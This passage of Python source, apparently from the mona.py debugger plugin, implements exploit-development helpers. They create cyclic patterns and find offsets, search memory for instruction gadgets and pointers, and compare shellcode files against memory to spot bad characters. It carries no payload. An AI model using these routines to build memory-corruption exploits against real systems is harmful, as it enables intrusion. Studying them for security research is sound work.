fulllist = list(set(fulllist).union(set(all_pointers[fileorder[fcnt]])))
fcnt += 1
else:
dbg.log("[+] Exploding reference list with values within range")
dbg.updateLog()
# create first reference list with ALL pointers within the range
allrefptr = []
reflist = all_pointers[shortestarray]
for refptr in reflist:
start_range = refptr - rangeval
if start_range < 0:
start_range = 0
end_range = refptr + rangeval
if start_range > end_range:
tmp = start_range
start_range = end_range
end_range = tmp
while start_range <= end_range:
if not start_range in allrefptr:
allrefptr.append(start_range)
start_range += 1
# do normal intersection
dbg.log("[+] Starting compare, please wait...")
dbg.updateLog()
s_remaining = allrefptr
s_fulllist = allrefptr
fcnt = 1
while fcnt < len(fileorder)-1 and len(s_remaining) > 0:
s_remaining = list(set(s_remaining).intersection(set(all_pointers[fileorder[fcnt]])))
s_fulllist = list(set(s_fulllist).union(set(all_pointers[fileorder[fcnt]])))
fcnt += 1
for s in s_remaining:
if not s in remaining:
remaining.append(s)
for s in s_fulllist:
if not s in fulllist:
fulllist.append(s)
nonmatching = list(set(fulllist) - set(remaining))
dbg.log(" Total nr of unique pointers : %d" % len(fulllist))
dbg.log(" Nr of matching pointers before filtering : %d" % len(remaining))
dbg.log(" Nr of non-matching pointers before filtering : %d" % len(nonmatching))
dbg.log("[+] Transforming results into output...")
outputlines = ""
outputlines_not = ""
# start building output
remaining.sort()
for remptr in remaining:
if fast:
outputlines += "0x%08x\n" % remptr
else:
thisinstr = all_input_files[shortestarray][remptr]
include = True
if checkstrict:
# check if all entries are the same
fcnt = 1
while (fcnt < len(fileorder)-1) and include:
if thisinstr != all_input_files[fileorder[fcnt]][remptr]:
include = False
fcnt += 1
else:
include = True
if include and (tomatch == "" or tomatch in thisinstr):
outputlines += "0x%08x : %s\n" % (remptr,thisinstr)
for nonptr in nonmatching:
if fast:
outputlines_not += "0x%08x\n" % nonptr
else:
thisinstr = ""
if nonptr in all_input_files[shortestarray]:
thisinstr = all_input_files[shortestarray][nonptr]
outputlines_not += "File(%d) 0x%08x : %s\n" % (shortestarray,nonptr,thisinstr)
for fileindex in all_input_files:
if fileindex != shortestarray:
these_entries = all_input_files[fileindex]
if nonptr in these_entries:
thisinstr = these_entries[nonptr]
outputlines_not += " File (%d). %s\n" % (fileindex,thisinstr)
else:
outputlines_not += " File (%d). Entry not found \n" % fileindex
dbg.log("[+] Writing output to files")
objcomparefile.write(outputlines, comparefile)
objcomparefilenot.write(outputlines_not, comparefilenot)
nrmatching = len(outputlines.split("\n")) - 1
dbg.log(" Wrote %d matching pointers to file" % nrmatching)
dbg.log("[+] Done.")
return
#------------------#
# Heap state #
#------------------#
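# getCurrentHeapState returns a dictionary mapping each heap base address in the debuggee
# to the state snapshot produced by MnHeap.getState() (an empty dict if no heaps are found)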
def getCurrentHeapState():
heapstate = {}
allheaps = []
try:
allheaps = dbg.getHeapsAddress()
except:
allheaps = []
if len(allheaps) > 0:
for heap in allheaps:
objHeap = MnHeap(heap)
thisheapstate = objHeap.getState()
heapstate[heap] = thisheapstate
return heapstate
#------------------#
# Cyclic pattern #
#------------------#
def createPattern(size,args={}):
"""
Create a cyclic (metasploit) pattern of a given size
Arguments:
size - value indicating desired length of the pattern
if value is > 20280, the pattern will repeat itself until it reaches desired length
Return:
string containing the cyclic pattern
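	Example (default charsets):
	    createPattern(12,{}) returns "Aa0Aa1Aa2Aa3"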
"""
char1="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
char2="abcdefghijklmnopqrstuvwxyz"
char3="0123456789"
if "extended" in args:
char3 += ",.;+=-_!&()#@({})[]%" # ascii, 'filename' friendly
if "c1" in args and args["c1"] != "":
char1 = args["c1"]
if "c2" in args and args["c2"] != "":
char2 = args["c2"]
if "c3" in args and args["c3"] != "":
char3 = args["c3"]
if not silent:
if not "extended" in args and size > 20280 and (len(char1) <= 26 or len(char2) <= 26 or len(char3) <= 10):
msg = "** You have asked to create a pattern > 20280 bytes, but with the current settings\n"
msg += "the pattern generator can't create a pattern of " + str(size) + " bytes. As a result,\n"
msg += "the pattern will be repeated for " + str(size-20280)+" bytes until it reaches a length of " + str(size) + " bytes.\n"
msg += "If you want a unique pattern larger than 20280 bytes, please either use the -extended option\n"
msg += "or extend one of the 3 charsets using options -c1, -c2 and/or -c3 **\n"
dbg.logLines(msg,highlight=1)
pattern = []
max = int(size)
while len(pattern) < max:
for ch1 in char1:
for ch2 in char2:
for ch3 in char3:
if len(pattern) < max:
pattern.append(ch1)
if len(pattern) < max:
pattern.append(ch2)
if len(pattern) < max:
pattern.append(ch3)
pattern = "".join(pattern)
return pattern
def findOffsetInPattern(searchpat,size=20280,args = {}):
"""
Check if a given searchpattern can be found in a cyclic pattern
Arguments:
searchpat : the ascii value or hexstr to search for
Return:
entries in the log window, indicating if the pattern was found and at what position
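	Example (default charsets):
	    findOffsetInPattern("Aa9A") and findOffsetInPattern("0x41396141") both report position 27
	    (hex input is treated as a little endian dword read from a register or memory)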
"""
mspattern=""
searchpats = []
modes = []
modes.append("normal")
modes.append("upper")
modes.append("lower")
extratext = ""
patsize=int(size)
if patsize == -1:
size = 500000
patsize = size
global silent
oldsilent=silent
for mode in modes:
silent=oldsilent
if mode == "normal":
silent=True
mspattern=createPattern(size,args)
silent=oldsilent
extratext = " "
elif mode == "upper":
silent=True
mspattern=createPattern(size,args).upper()
silent=oldsilent
extratext = " (uppercase) "
elif mode == "lower":
silent=True
mspattern=createPattern(size,args).lower()
silent=oldsilent
extratext = " (lowercase) "
if len(searchpat)==3:
#register ?
searchpat = searchpat.upper()
regs = dbg.getRegs()
if searchpat in regs:
searchpat = "0x" + toHex(regs[searchpat])
if len(searchpat)==4:
ascipat=searchpat
if not silent:
dbg.log("Looking for %s in pattern of %d bytes" % (ascipat,patsize))
if ascipat in mspattern:
patpos = mspattern.find(ascipat)
if not silent:
dbg.log(" - Pattern %s found in cyclic pattern%sat position %d" % (ascipat,extratext,patpos),highlight=1)
else:
#reversed ?
ascipat_r = ascipat[3]+ascipat[2]+ascipat[1]+ascipat[0]
if ascipat_r in mspattern:
patpos = mspattern.find(ascipat_r)
if not silent:
dbg.log(" - Pattern %s (%s reversed) found in cyclic pattern%sat position %d" % (ascipat_r,ascipat,extratext,patpos),highlight=1)
else:
if not silent:
dbg.log(" - Pattern %s not found in cyclic pattern%s" % (ascipat_r,extratext))
if len(searchpat)==8:
searchpat="0x"+searchpat
if len(searchpat)==10:
hexpat=searchpat
ascipat3 = toAscii(hexpat[8]+hexpat[9])+toAscii(hexpat[6]+hexpat[7])+toAscii(hexpat[4]+hexpat[5])+toAscii(hexpat[2]+hexpat[3])
if not silent:
dbg.log("Looking for %s in pattern of %d bytes" % (ascipat3,patsize))
if ascipat3 in mspattern:
patpos = mspattern.find(ascipat3)
if not silent:
dbg.log(" - Pattern %s (%s) found in cyclic pattern%sat position %d" % (ascipat3,hexpat,extratext,patpos),highlight=1)
else:
#maybe it's reversed
ascipat4=toAscii(hexpat[2]+hexpat[3])+toAscii(hexpat[4]+hexpat[5])+toAscii(hexpat[6]+hexpat[7])+toAscii(hexpat[8]+hexpat[9])
if not silent:
dbg.log("Looking for %s in pattern of %d bytes" % (ascipat4,patsize))
if ascipat4 in mspattern:
patpos = mspattern.find(ascipat4)
if not silent:
dbg.log(" - Pattern %s (%s reversed) found in cyclic pattern%sat position %d" % (ascipat4,hexpat,extratext,patpos),highlight=1)
else:
if not silent:
dbg.log(" - Pattern %s not found in cyclic pattern%s " % (ascipat4,extratext))
def findPatternWild(modulecriteria,criteria,pattern,base,top,patterntype):
"""
Performs a search for instructions, accepting wildcards
Arguments :
modulecriteria - dictionary with criteria modules need to comply with.
criteria - dictionary with criteria the pointers need to comply with.
pattern - the pattern to search for.
base - the base address in memory the search should start at
top - the top address in memory the search should not go beyond
patterntype - type of search to conduct (str or bin)
"""
global silent
rangestosearch = []
tmpsearch = []
allpointers = {}
results = {}
mindistance = 4
maxdistance = 40
if "mindistance" in criteria:
mindistance = criteria["mindistance"]
if "maxdistance" in criteria:
maxdistance = criteria["maxdistance"]
maxdepth = 8
preventbreak = True
if "all" in criteria:
preventbreak = False
if "depth" in criteria:
maxdepth = criteria["depth"]
if not silent:
dbg.log("[+] Type of search: %s" % patterntype)
dbg.log("[+] Searching for matches up to %d instructions deep" % maxdepth)
if len(modulecriteria) > 0:
modulestosearch = getModulesToQuery(modulecriteria)
# convert modules to ranges
for modulename in modulestosearch:
objmod = MnModule(modulename)
mBase = objmod.moduleBase
mTop = objmod.moduleTop
if mBase < base and base < mTop:
mBase = base
if mTop > top:
mTop = top
if mBase >= base and mBase < top:
if not [mBase,mTop] in rangestosearch:
rangestosearch.append([mBase,mTop])
# if no modules were specified, then also add the other ranges (outside modules)
if not "modules" in modulecriteria:
outside = getRangesOutsideModules()
for range in outside:
mBase = range[0]
mTop = range[1]
if mBase < base and base < mTop:
mBase = base
if mTop > top:
mTop = top
if mBase >= base and mBase < top:
if not [mBase,mTop] in rangestosearch:
rangestosearch.append([mBase,mTop])
else:
rangestosearch.append([base,top])
pattern = pattern.replace("'","").replace('"',"").replace(" "," ").replace(", ",",").replace(" ,",",").replace("# ","#").replace(" #","#")
if len(pattern) == 0:
dbg.log("** Invalid search pattern **")
return
# break apart the instructions
# search for the first instruction(s)
allinstructions = pattern.split("#")
instructionparts = []
instrfound = False
for instruction in allinstructions:
instruction = instruction.strip().lower()
if instrfound and instruction != "":
instructionparts.append(instruction)
else:
if instruction != "*" and instruction != "":
instructionparts.append(instruction)
instrfound = True
# remove wildcards placed at the end
for i in rrange(len(instructionparts)):
if instructionparts[i] == "*":
instructionparts.pop(i)
else:
break
# glue simple instructions together if possible
# reset array
allinstructions = []
stopnow = False
mergeinstructions = []
mergestopped = False
mergetxt = ""
for instr in instructionparts:
if instr.find("*") == -1 and instr.find("r32") == -1 and not mergestopped:
mergetxt += instr + "\n"
else:
allinstructions.append(instr)
mergestopped = True
mergetxt = mergetxt.strip("\n")
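	# plain leading instructions (no wildcard and no r32) are merged into one multi-line search string;
	# the first instruction that does contain r32 or * is expanded below into every register and
	# offset combination and used as the start pattern for the memory search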
searchPattern = []
remaining = allinstructions
if mergetxt != "":
searchPattern.append(mergetxt)
else:
# at this point, we're sure the first instruction has some kind of r32 and/or offset variable
# get all of the combinations for this one
# and use them as searchPattern
cnt = 0
stopped = False
for instr in allinstructions:
if instr != "*" and (instr.find("r32") > -1 or instr.find("*") > -1) and not stopped:
if instr.find("r32") > -1:
for reg in dbglib.Registers32BitsOrder:
thisinstr = instr.replace("r32",reg.lower())
if instr.find("*") > -1:
# contains a wildcard offset
startdist = mindistance
while startdist < maxdistance:
operator = ""
if startdist < 0:
operator = "-"
replacewith = operator + "0x%02x" % startdist
thisinstr2 = thisinstr.replace("*",replacewith)
searchPattern.append(thisinstr2)
startdist += 1
else:
searchPattern.append(thisinstr)
else:
# no r32
if instr.find("*") > -1:
# contains a wildcard offset
startdist = mindistance
while startdist < maxdistance:
operator = ""
if startdist < 0:
operator = "-"
replacewith = operator + "0x%02x" % startdist
thisinstr2 = instr.replace("*",replacewith)
searchPattern.append(thisinstr2)
startdist += 1
else:
searchPattern.append(instr)
remaining.pop(cnt)
stopped = True
cnt += 1
# search for all these beginnings
if len(searchPattern) > 0:
if not silent:
dbg.log("[+] Started search (%d start patterns)" % len(searchPattern))
dbg.updateLog()
for ranges in rangestosearch:
mBase = ranges[0]
mTop = ranges[1]
if not silent:
dbg.log("[+] Searching startpattern between 0x%s and 0x%s" % (toHex(mBase),toHex(mTop)))
dbg.updateLog()
oldsilent=silent
silent=True
pointers = searchInRange(searchPattern,mBase,mTop,criteria)
silent=oldsilent
allpointers = mergeOpcodes(allpointers,pointers)
# for each of the findings, see if it contains the other instructions too
# disassemble forward up to 'maxdepth' instructions
for ptrtypes in allpointers:
for ptrs in allpointers[ptrtypes]:
thisline = ""
try:
for depth in xrange(maxdepth):
tinstr = getDisasmInstruction(dbg.disasmForward(ptrs, depth)).lower() + "\n"
if tinstr != "???":
thisline += tinstr
else:
thisline = ""
break
except:
continue
allfound = True
thisline = thisline.strip("\n")
if thisline != "":
parts = thisline.split("\n")
maxparts = len(parts)-1
partcnt = 1
searchfor = ""
remcnt = 0
lastpos = 0
remmax = len(remaining)
while remcnt < remmax:
searchfor = remaining[remcnt]
searchlist = []
if searchfor == "*":
while searchfor == "*" and remcnt < remmax:
searchfor = remaining[remcnt+1]
rangemin = partcnt
rangemax = maxparts
remcnt += 1
else:
rangemin = partcnt
rangemax = partcnt
if searchfor.find("r32") > -1:
for reg in dbglib.Registers32BitsOrder:
searchlist.append(searchfor.replace("r32",reg.lower()))
else:
searchlist.append(searchfor)
partfound = False
while rangemin <= rangemax and not partfound and rangemax <= maxparts:
for searchfor in searchlist:
if parts[rangemin].find(searchfor) > -1:
partfound = True
lastpos = rangemin
partcnt = lastpos # set counter to current position
break
if not partfound and preventbreak:
#check if current instruction would break chain
if wouldBreakChain(parts[rangemin]):
# bail out
partfound = False
break
rangemin += 1
remcnt += 1
partcnt += 1
if not partfound:
allfound = False
break
if allfound:
theline = " # ".join(parts[:lastpos+1])
if theline != "":
if not theline in results:
results[theline] = [ptrs]
else:
results[theline] += [ptrs]
return results
def wouldBreakChain(instruction):
"""
Checks if the given instruction would potentially break the instruction chain
Argument :
instruction: the instruction to check
Returns :
boolean
"""
goodinstruction = isGoodGadgetInstr(instruction)
if goodinstruction:
return False
return True
def findPattern(modulecriteria,criteria,pattern,ptype,base,top,consecutive=False,rangep2p=0,level=0,poffset=0,poffsetlevel=0):
"""
Performs a find in memory for a given pattern
Arguments:
modulecriteria - dictionary with criteria modules need to comply with.
criteria - dictionary with criteria the pointers need to comply with.
One of the criteria can be "p2p", indicating that the search should look for
pointers to pointers to the pattern
pattern - the pattern to search for.
ptype - the type of the pattern, can be 'asc', 'bin', 'ptr', 'instr' or 'file'
If no type is specified, the routine will try to 'guess' the types
when type is set to file, it won't actually search in memory for pattern, but it will
read all pointers from that file and search for pointers to those pointers
(so basically, type 'file' is only useful in combination with -p2p)
base - the base address in memory the search should start at
top - the top address in memory the search should not go beyond
consecutive - Boolean, indicating if consecutive pointers should be skipped
rangep2p - if not set to 0, the pointer to pointer search will also look rangep2p bytes back for each pointer,
thus allowing you to find close pointer to pointers
poffset - only used when doing p2p, will add offset to found pointer address before looking to ptr to ptr
poffsetlevel - apply the offset at this level of the chain
level - number of levels deep to look for ptr to ptr. level 0 is default, which means search for pointer to searchpattern
Return:
all pointers (or pointers to pointers) to the given search pattern in memory
"""
wildcardsearch = False
rangestosearch = []
tmpsearch = []
p2prangestosearch = []
global silent
if len(modulecriteria) > 0:
modulestosearch = getModulesToQuery(modulecriteria)
# convert modules to ranges
for modulename in modulestosearch:
objmod = MnModule(modulename)
mBase = objmod.moduleBase
mTop = objmod.moduleTop
if mBase < base and base < mTop:
mBase = base
if mTop > top:
mTop = top
if mBase >= base and mBase < top:
if not [mBase,mTop] in rangestosearch:
rangestosearch.append([mBase,mTop])
# if no modules were specified, then also add the other ranges (outside modules)
if not "modules" in modulecriteria:
outside = getRangesOutsideModules()
for range in outside:
mBase = range[0]
mTop = range[1]
if mBase < base and base < mTop:
mBase = base
if mTop > top:
mTop = top
if mBase >= base and mBase < top:
if not [mBase,mTop] in rangestosearch:
rangestosearch.append([mBase,mTop])
else:
rangestosearch.append([base,top])
tmpsearch.append([0,TOP_USERLAND])
allpointers = {}
originalPattern = pattern
# guess the type if it is not specified
if ptype == "":
if len(pattern) > 2 and pattern[0:2].lower() == "0x":
ptype = "ptr"
elif "\\x" in pattern:
ptype = "bin"
else:
ptype = "asc"
if ptype == "bin" and ".." in pattern:
wildcardsearch = True
if not silent:
dbg.log(" - Wildcard \\x.. detected")
if "unic" in criteria and ptype == "asc":
ptype = "bin"
binpat = ""
pattern = pattern.replace('"',"")
for thischar in pattern:
binpat += "\\x" + str(toHexByte(ord(thischar))) + "\\x00"
pattern = binpat
originalPattern += " (unicode)"
if not silent:
dbg.log(" - Expanded ascii pattern to unicode, switched search mode to bin")
bytes = ""
patternfilename = ""
split1 = re.compile(' ')
split2 = re.compile(':')
split3 = re.compile("\*")
if not silent:
dbg.log(" - Treating search pattern as %s" % ptype)
if ptype == "ptr":
pattern = pattern.replace("0x","")
value = int(pattern,16)
bytes = struct.pack('<I',value)
elif ptype == "bin":
if len(pattern) % 2 != 0:
dbg.log("Invalid hex pattern", highlight=1)
return
if not wildcardsearch:
bytes = hex2bin(pattern)
else:
# check if first byte is a byte and not a wildcard
if len(pattern) > 3 and pattern[2:4] == "..":
dbg.log(" *** Can't start a wildcard search with a wildcard. Specify a byte instead ***",highlight =1)
return
else:
# search for the first byte and then check wildcards later
foundstartbytes = False
sindex = 0
while not foundstartbytes:
b = pattern[sindex:sindex+4]
if not ".." in b:
bytes += hex2bin(pattern[sindex:sindex+4])
else:
foundstartbytes = True
sindex += 4
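				# 'bytes' now holds the literal prefix up to the first ".." wildcard; the memory search
				# below uses that prefix and the full wildcard mask is applied to each hit afterwards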
elif ptype == "asc":
if pattern.startswith('"') and pattern.endswith('"'):
pattern = pattern.replace('"',"")
elif pattern.startswith("'") and pattern.endswith("'"):
pattern = pattern.replace("'","")
bytes = pattern
elif ptype == "instr":
pattern = pattern.replace("'","").replace('"',"").replace(" "," ").replace(", ",",").replace(" #","#").replace("# ","#")
silent = True
bytes = hex2bin(assemble(pattern,""))
silent = False
if bytes == "":
dbg.log("Invalid instruction - could not assemble %s" % pattern,highlight=1)
return
elif ptype == "file":
patternfilename = pattern.replace("'","").replace('"',"")
dbg.log(" - Search patterns = all pointers in file %s" % patternfilename)
dbg.log(" Extracting pointers...")
FILE=open(patternfilename,"r")
contents = FILE.readlines()
FILE.close()
extracted = 0
for thisLine in contents:
if thisLine.lower().startswith("0x"):
lineparts=split1.split(thisLine)
thispointer = lineparts[0]
#get type = from : to *
if len(lineparts) > 1:
subparts = split2.split(thisLine)
if len(subparts) > 1:
if subparts[1] != "":
subsubparts = split3.split(subparts[1])
if not subsubparts[0] in allpointers:
allpointers[subsubparts[0]] = [hexStrToInt(thispointer)]
else:
allpointers[subsubparts[0]] += [hexStrToInt(thispointer)]
extracted += 1
dbg.log(" %d pointers extracted." % extracted)
dbg.updateLog()
fakeptrcriteria = {}
fakeptrcriteria["accesslevel"] = "*"
if "p2p" in criteria or level > 0:
#save range for later, search in all of userland for now
p2prangestosearch = rangestosearch
rangestosearch = tmpsearch
if ptype != "file":
for ranges in rangestosearch:
mBase = ranges[0]
mTop = ranges[1]
if not silent:
dbg.log("[+] Searching from 0x%s to 0x%s" % (toHex(mBase),toHex(mTop)))
dbg.updateLog()
searchPattern = []
searchPattern.append([originalPattern, bytes])
oldsilent=silent
silent=True
pointers = searchInRange(searchPattern,mBase,mTop,criteria)
silent=oldsilent
allpointers = mergeOpcodes(allpointers,pointers)
# filter out bad ones if wildcardsearch is enabled
if wildcardsearch and ptype == "bin":
nrbytes = ( len(pattern) / 4) - len(bytes)
if nrbytes > 0:
maskpart = pattern[len(bytes)*4:]
tocomparewith_tmp = maskpart.split("\\x")
tocomparewith = []
for tcw in tocomparewith_tmp:
if len(tcw) == 2:
tocomparewith.append(tcw)
dbg.log("[+] Applying wildcard mask, %d remaining bytes: %s" % (nrbytes,maskpart))
remptrs = {}
for ptrtype in allpointers:
for ptr in allpointers[ptrtype]:
rfrom = ptr + len(bytes)
bytesatlocation = dbg.readMemory(rfrom,nrbytes)
#dbg.log("Read %d bytes from 0x%08x" % (len(bytesatlocation),rfrom))
compareindex = 0
wildcardmatch = True
for thisbyte in bytesatlocation:
thisbytestr = bin2hexstr(thisbyte).replace("\\x","")
thisbytecompare = tocomparewith[compareindex]
if thisbytecompare != ".." and thisbytestr.lower() != thisbytecompare.lower():
wildcardmatch=False
break
compareindex += 1
if wildcardmatch:
if not ptrtype in remptrs:
remptrs[ptrtype] = [ptr]
else:
remptrs[ptrtype].append(ptr)
allpointers = remptrs
if ptype == "file" and level == 0:
level = 1
if consecutive:
# get all pointers and sort them
rawptr = {}
for ptrtype in allpointers:
for ptr in allpointers[ptrtype]:
if not ptr in rawptr:
rawptr[ptr]=ptrtype
if not silent:
dbg.log("[+] Number of pointers to process : %d" % len(rawptr))
sortedptr = rawptr.items()
sortedptr.sort(key = itemgetter(0))
#skip consecutive ones and increment size
consec_delta = len(bytes)
previousptr = 0
savedptr = 0
consec_size = 0
allpointers = {}
for ptr,ptrinfo in sortedptr:
if previousptr == 0:
previousptr = ptr
savedptr = ptr
if previousptr != ptr:
if ptr <= (previousptr + consec_delta):
previousptr = ptr
else:
key = ptrinfo + " ("+ str(previousptr+consec_delta-savedptr) + ")"
if not key in allpointers:
allpointers[key] = [savedptr]
else:
allpointers[key] += [savedptr]
previousptr = ptr
savedptr = ptr
#recursive search ?
if len(allpointers) > 0:
remainingpointers = allpointers
if level > 0:
thislevel = 1
while thislevel <= level:
if not silent:
pcnt = 0
for ptype,ptrs in remainingpointers.iteritems():
for ptr in ptrs:
pcnt += 1
dbg.log("[+] %d remaining types found at this level, total of %d pointers" % (len(remainingpointers),pcnt))
dbg.log("[+] Looking for pointers to pointers, level %d..." % thislevel)
poffsettxt = ""
if thislevel == poffsetlevel:
dbg.log(" I will apply offset %d (decimal) to discovered pointers to pointers..." % poffset)
poffsettxt = "%d(%xh)" % (poffset,poffset)
dbg.updateLog()
searchPattern = []
foundpointers = {}
for ptype,ptrs in remainingpointers.iteritems():
for ptr in ptrs:
cnt = 0
#if thislevel == poffsetlevel:
# ptr = ptr + poffset
while cnt <= rangep2p:
bytes = struct.pack('<I',ptr-cnt)
if ptype == "file":
originalPattern = ptype
if cnt == 0:
searchPattern.append(["ptr" + poffsettxt + " to 0x" + toHex(ptr) +" (-> ptr to " + originalPattern + ") ** ", bytes])
else:
searchPattern.append(["ptr" + poffsettxt + " to 0x" + toHex(ptr-cnt) +" (-> close ptr to " + originalPattern + ") ** ", bytes])
cnt += 1
#only apply rangep2p in level 1
if thislevel == 1:
rangep2p = 0
remainingpointers = {}
for ranges in p2prangestosearch:
mBase = ranges[0]
mTop = ranges[1]
if not silent:
dbg.log("[+] Searching from 0x%s to 0x%s" % (toHex(mBase),toHex(mTop)))
dbg.updateLog()
oldsilent = silent
silent=True
pointers = searchInRange(searchPattern,mBase,mTop,fakeptrcriteria)
silent=oldsilent
for ptrtype in pointers:
if not ptrtype in remainingpointers:
if poffsetlevel == thislevel:
# fixup found pointers, apply offset now
ptrlist = []
for thisptr in pointers[ptrtype]:
thisptr = thisptr + poffset
ptrlist.append(thisptr)
pointers[ptrtype] = ptrlist
remainingpointers[ptrtype] = pointers[ptrtype]
thislevel += 1
if len(remainingpointers) == 0:
if not silent:
dbg.log("[+] No more pointers left, giving up...", highlight=1)
break
allpointers = remainingpointers
return allpointers
def compareFileWithMemory(filename,startpos,skipmodules=False,findunicode=False):
dbg.log("[+] Reading file %s..." % filename)
srcdata_normal=[]
srcdata_unicode=[]
tagresults=[]
criteria = {}
criteria["accesslevel"] = "*"
try:
srcfile = open(filename,"rb")
content = srcfile.readlines()
srcfile.close()
for eachLine in content:
srcdata_normal += eachLine
for eachByte in srcdata_normal:
eachByte+=struct.pack('B', 0)
srcdata_unicode += eachByte
dbg.log(" Read %d bytes from file" % len(srcdata_normal))
except:
dbg.log("Error while reading file %s" % filename, highlight=1)
return
# loop normal and unicode
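	# 'normal' compares the file bytes as-is; 'unicode' compares the UTF-16LE expansion
	# (a null byte appended after every input byte) to catch unicode-converted buffers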
comparetable=dbg.createTable('mona Memory comparison results',['Address','Status','BadChars','Type','Location'])
modes = ["normal", "unicode"]
if not findunicode:
modes.remove("unicode")
objlogfile = MnLog("compare.txt")
logfile = objlogfile.reset()
for mode in modes:
if mode == "normal":
srcdata = srcdata_normal
if mode == "unicode":
srcdata = srcdata_unicode
maxcnt = len(srcdata)
if maxcnt < 8:
dbg.log("Error - file does not contain enough bytes (min 8 bytes needed)",highlight=1)
return
locations = []
if startpos == 0:
dbg.log("[+] Locating all copies in memory (%s)" % mode)
btcnt = 0
cnt = 0
linecount = 0
hexstr = ""
hexbytes = ""
for eachByte in srcdata:
if cnt < 8:
hexbytes += eachByte
if len((hex(ord(srcdata[cnt]))).replace('0x',''))==1:
hexchar=hex(ord(srcdata[cnt])).replace('0x', '\\x0')
else:
hexchar = hex(ord(srcdata[cnt])).replace('0x', '\\x')
hexstr += hexchar
cnt += 1
dbg.log(" - searching for "+hexstr)
global silent
silent = True
results = findPattern({},criteria,hexstr,"bin",0,TOP_USERLAND,False)
for type in results:
for ptr in results[type]:
ptrinfo = MnPointer(ptr).memLocation()
if not skipmodules or (skipmodules and (ptrinfo in ["Heap","Stack","??"])):
locations.append(ptr)
if len(locations) == 0:
dbg.log(" Oops, no copies found")
else:
startpos_fixed = startpos
locations.append(startpos_fixed)
if len(locations) > 0:
dbg.log(" - Comparing %d location(s)" % (len(locations)))
dbg.log("Comparing bytes from file with memory :")
for location in locations:
memcompare(location,srcdata,comparetable,mode, smart=(mode == 'normal'))
silent = False
return
def memoized(func):
	''' A function decorator to make a function cache its return values.
If a function returns a generator, it's transformed into a list and
cached that way. '''
cache = {}
def wrapper(*args):
if args in cache:
return cache[args]
val = func(*args)
if isinstance(val, types.GeneratorType):
val = list(val)
cache[args] = val
return val
wrapper.__doc__ = func.__doc__
wrapper.func_name = '%s_memoized' % func.func_name
return wrapper
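# note: the cache key is the full argument tuple (including 'self' for methods), and generator
# results are materialized into lists so the memoized value can be iterated more than once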
class MemoryComparator(object):
''' Solve the memory comparison problem with a special dynamic programming
algorithm similar to that for the LCS problem '''
Chunk = namedtuple('Chunk', 'unmodified i j dx dy xchunk ychunk')
move_to_gradient = {
0: (0, 0),
1: (0, 1),
2: (1, 1),
3: (2, 1),
}
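	# move encoding used by get_grid()/get_blocks(): 0 = stop, 1 = byte dropped from x (advance x only),
	# 2 = byte unchanged or modified (advance both), 3 = byte expanded to two bytes (advance y twice)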
def __init__(self, x, y):
self.x, self.y = x, y
@memoized
def get_last_unmodified_chunk(self):
''' Returns the index of the last chunk of size > 1 that is unmodified '''
try:
return max(i for i, c in enumerate(self.get_chunks()) if c.unmodified and c.dx > 1)
except:
# no match
return -1
@memoized
def get_grid(self):
''' Builds a 2-d suffix grid for our DP algorithm. '''
x = self.x
y = self.y[:len(x)*2]
width, height = len(x), len(y)
values = [[0] * (width + 1) for j in range(height + 1)]
moves = [[0] * (width + 1) for j in range(height + 1)]
equal = [[x[i] == y[j] for i in range(width)] for j in range(height)]
equal.append([False] * width)
for j, i in itertools.product(rrange(height + 1), rrange(width + 1)):
value = values[j][i]
if i >= 1 and j >= 1:
if equal[j-1][i-1]:
values[j-1][i-1] = value + 1
moves[j-1][i-1] = 2
elif value > values[j][i-1]:
values[j-1][i-1] = value
moves[j-1][i-1] = 2
if i >= 1 and not equal[j][i-1] and value - 2 > values[j][i-1]:
values[j][i-1] = value - 2
moves[j][i-1] = 1
if i >= 1 and j >= 2 and not equal[j-2][i-1] and value - 1 > values[j-2][i-1]:
values[j-2][i-1] = value - 1
moves[j-2][i-1] = 3
return (values, moves)
@memoized
def get_blocks(self):
'''
Compares two binary strings under the assumption that y is the result of
applying the following transformations onto x:
* change single bytes in x (likely)
* expand single bytes in x to two bytes (less likely)
* drop single bytes in x (even less likely)
Returns a generator that yields elements of the form (unmodified, xdiff, ydiff),
where each item represents a binary chunk with "unmodified" denoting whether the
chunk is the same in both strings, "xdiff" denoting the size of the chunk in x
and "ydiff" denoting the size of the chunk in y.
Example:
>>> x = "abcdefghijklm"
>>> y = "mmmcdefgHIJZklm"
>>> list(MemoryComparator(x, y).get_blocks())
[(False, 2, 3), (True, 5, 5),
(False, 3, 4), (True, 3, 3)]
'''
x, y = self.x, self.y
_, moves = self.get_grid()
# walk the grid
path = []
i, j = 0, 0
while True:
dy, dx = self.move_to_gradient[moves[j][i]]
if dy == dx == 0: break
path.append((dy == 1 and x[i] == y[j], dy, dx))
j, i = j + dy, i + dx
for i, j in zip(range(i, len(x)), itertools.count(j)):
if j < len(y): path.append((x[i] == y[j], 1, 1))
else: path.append((False, 0, 1))
i = j = 0
for unmodified, subpath in itertools.groupby(path, itemgetter(0)):
ydiffs = map(itemgetter(1), subpath)
dx, dy = len(ydiffs), sum(ydiffs)
yield unmodified, dx, dy
i += dx
j += dy
@memoized
def get_chunks(self):
i = j = 0
for unmodified, dx, dy in self.get_blocks():
yield self.Chunk(unmodified, i, j, dx, dy, self.x[i:i+dx], self.y[j:j+dy])
i += dx
j += dy
@memoized
def guess_mapping(self):
''' Tries to guess how the bytes in x have been mapped to substrings in y by
applying nasty heuristics.
Examples:
>>> list(MemoryComparator("abcdefghijklm", "mmmcdefgHIJZklm").guess_mapping())
[('m', 'm'), ('m',), ('c',), ('d',), ('e',), ('f',), ('g',), ('H', 'I'), ('J',),
('Z',), ('k',), ('l',), ('m',)]
>>> list(MemoryComparator("abcdefgcbadefg", "ABBCdefgCBBAdefg").guess_mapping())
[('A',), ('B', 'B'), ('C',), ('d',), ('e',), ('f',), ('g',), ('C',), ('B', 'B'),
('A',), ('d',), ('e',), ('f',), ('g',)]
'''
x, y = self.x, self.y
mappings_by_byte = defaultdict(lambda: defaultdict(int))
for c in self.get_chunks():
dx, dy = c.dx, c.dy
# heuristics to detect expansions
if dx < dy and dy - dx <= 3 and dy <= 5:
for i, b in enumerate(c.xchunk):
slices = set()
for start in range(i, min(2*i + 1, dy)):
for size in range(1, min(dy - start + 1, 3)):
slc = tuple(c.ychunk[start:start+size])
if slc in slices: continue
mappings_by_byte[b][slc] += 1
slices.add(slc)
for b, values in mappings_by_byte.iteritems():
mappings_by_byte[b] = sorted(values.items(),
key=lambda (value, count): (-count, -len(value)))
for c in self.get_chunks():
